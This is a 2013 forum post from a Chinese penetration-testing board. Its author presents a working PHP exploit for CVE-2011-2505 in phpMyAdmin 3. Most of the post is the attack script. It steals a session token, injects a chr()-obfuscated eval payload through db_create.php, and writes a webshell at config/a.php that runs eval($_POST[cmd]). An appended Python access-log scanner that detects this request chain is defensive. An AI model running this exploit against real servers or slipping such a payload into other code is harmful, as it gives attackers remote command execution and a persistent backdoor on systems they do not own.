China Network Penetration Testing Alliance

Title: phpMyAdmin3 remote code execute, PHP version exploit

Author: admin    Time: 2013-2-21 09:13
Lately I have been a full-time stay-at-home dad, out of touch with the scene for many months, and the blog has not been updated either.

Last night I was up all night with the kid and saw Heige's discussion of the phpMyAdmin3 vulnerability in the php security group. I had not looked at the vulnerable code before, though I had seen wofeiwo's exp on Weibo a while back; according to Heige there is a way to exploit it that is not "chicken ribs" (not useless), so during the night I dug out the code, studied it, and wrote this reheated exp. Since I got to it late, and many people had already studied it and written exps, mine is just reheating leftovers, a bit of research to pass the time.

First, credit to wofeiwo's Python version of the exp, and to the dedication of wofeiwo and superhei; role models to learn from. That earlier exp, however, has some limitations when used:
First, it requires session.auto_start = 1;
Second, in the default pma3 code the libraries directory is already blocked from access by .htaccess.
And of course there is a third point, a gap nobody can get past: the config directory must exist and be writable.

After reading Heige's remarks in the group and looking at the code again, I found that the first two limitations can both be ignored. So this vulnerability really is not that useless after all.

So I wrote this PHP version of the exp; the code follows:
; Q6 m7 Q( \6 D% B* y% B5 d
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
**/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists.
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config does not exist!\n");
}

/**
 * Try to get token and sessionid
**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
// session id is taken from the Set-Cookie header, the token from a link in the page body
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=isset($resp[3])?$resp[3]:'';
$sessionid=isset($resp[1])?$resp[1]:'';
if($token && $sessionid){
    echo "[+] token: $token\n";
    echo "[+] Session ID: $sessionid\n";
}else{
    exit("[-] Can't get token and Session ID, Exploit Failed!\n");
}

/**
 * Try to insert shell into session
**/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
**/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
**/
echo "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Exploit successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
}else{
    exit("[-] Exploit Failed! Perhaps the directory:config does not exist or is not writeable!\n");
}

// minimal raw HTTP/1.1 client: GET when $data is empty, otherwise a form POST
function php_request($url,$data='',$cookie=''){
    global  $host, $path;

    $method=$data?'POST':'GET';

    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host;
        die;
    }
    fputs($fp, $packet);

    $resp = '';
    while (!feof($fp))
        $resp .= fread($fp, 1024);
    fclose($fp);

    return $resp;
}
?>
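As an added defender-side example (not part of the original post and not oldjun's code), the following Python script scans web-server access-log lines for the request sequence the exploit above makes: a query carrying session_to_unset together with a _SESSION[...] key (the CVE-2011-2505 session injection), the POST to setup/config.php that saves the poisoned session into config/config.inc.php, and the follow-up fetch from the config/ directory. The log lines, client addresses and function names are constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (combined format); 10.0.0.5 runs the full
# chain, 10.0.0.7 only probes config/, 10.0.0.9 makes an ordinary request.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Feb/2013:09:13:01 +0800] "GET /pma/index.php HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
10.0.0.5 - - [21/Feb/2013:09:13:02 +0800] "GET /pma/db_create.php?token=0123456789abcdef0123456789abcdef&session_to_unset=x&_SESSION%5BConfigFile%5D%5BServers%5D%5B0%5D%5Bhost%5D=evil HTTP/1.1" 200 212 "-" "Mozilla/4.0"
10.0.0.5 - - [21/Feb/2013:09:13:03 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 88 "-" "Mozilla/4.0"
10.0.0.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 640 "-" "Mozilla/4.0"
10.0.0.7 - - [21/Feb/2013:09:13:30 +0800] "GET /pma/config/ HTTP/1.1" 403 199 "-" "curl/7.29"
10.0.0.9 - - [21/Feb/2013:09:14:00 +0800] "GET /pma/db_create.php?token=0123456789abcdef0123456789abcdef HTTP/1.1" 200 3020 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
CHAIN = ["session_injection", "setup_save", "config_dir_access"]

def classify(method, target):
    """Map one request to the exploit step it matches, or None."""
    parts = urlsplit(target)
    path = parts.path.lower()
    query = unquote_plus(parts.query).lower()   # decode %5B/%5D so _SESSION[ is visible
    if "session_to_unset" in query and "_session[" in query:
        return "session_injection"              # CVE-2011-2505 session variable injection
    if method == "POST" and path.endswith("/setup/config.php"):
        return "setup_save"                     # setup script writes config/config.inc.php
    if "/config/" in path:
        return "config_dir_access"              # config/ should not exist on a deployed pma
    return None

def scan(log_text):
    """Per-client list of matched steps; flag clients that complete all three in order."""
    steps = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hit = classify(m["method"], m["target"])
        if hit:
            steps[m["ip"]].append(hit)
    report = {}
    for ip, hits in steps.items():
        idx = [hits.index(s) if s in hits else -1 for s in CHAIN]
        complete = -1 not in idx and idx == sorted(idx)
        report[ip] = {"steps": hits, "likely_exploited": complete}
    return report
```

A single config_dir_access hit only means the directory is reachable and should be removed or made unwritable; the ordered three-step chain from one client is the signal worth an incident ticket.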




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2